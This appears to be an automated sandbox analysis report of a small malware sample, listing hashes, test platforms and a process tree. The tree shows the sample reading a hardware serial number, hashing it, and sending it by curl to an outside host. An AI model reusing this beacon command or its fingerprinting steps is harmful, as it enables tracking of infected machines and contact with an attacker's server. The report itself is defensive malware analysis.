Analysis
-
max time kernel
148s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
29-07-2024 07:40
Static task
static1
Behavioral task
behavioral1
Sample
3c6492a33885e363cae2841e0597c730_JaffaCakes118
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
3c6492a33885e363cae2841e0597c730_JaffaCakes118
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
3c6492a33885e363cae2841e0597c730_JaffaCakes118
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
3c6492a33885e363cae2841e0597c730_JaffaCakes118
Resource
debian9-mipsel-20240729-en
General
-
Target
3c6492a33885e363cae2841e0597c730_JaffaCakes118
-
Size
10KB
-
MD5
3c6492a33885e363cae2841e0597c730
-
SHA1
99d5f88fb1a33f321aa614cfe792200bdf9eba5c
-
SHA256
ead1f229097555af8724321021bb8bb5421947e67cd244065dbd2990a6dcdb49
-
SHA512
302bdb0ffb3be9285e7453e04d6067ca03ebdb21af5c0f26e6cb982de1c91631bffb2aab5e2f3a298a54b93337e1b510bee87e3855503a246a130bcc87ce5193
-
SSDEEP
192:g0AjH8A5Zjpcjxi3LKVMyIu8bXkvLvTWM3Tk3Sw3a8na8:g1cA5t8xgNb0/mVLnP
Malware Config
Signatures
-
Reads runtime system information 1 IoCs
Reads data from /proc virtual filesystem.
Processes:
awkdescription ioc process File opened for reading /proc/self/maps awk
Processes
-
/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes1181⤵PID:1525
-
/usr/bin/touchtouch "/root/Library/Application Support/.upd2029"2⤵PID:1527
-
/usr/bin/opensslopenssl md52⤵PID:1532
-
/usr/bin/trtr -d "\\n"2⤵PID:1531
-
/usr/bin/awkawk "-F\"" "/IOPlatformSerialNumber/{print \$(NF-1)}"2⤵
- Reads runtime system information
PID:1530 -
/usr/bin/curlcurl -s -L "http://events.macmymacupdater.com/services/channel/?mid=(stdin)= d41d8cd98f00b204e9800998ecf8427e"2⤵PID:1534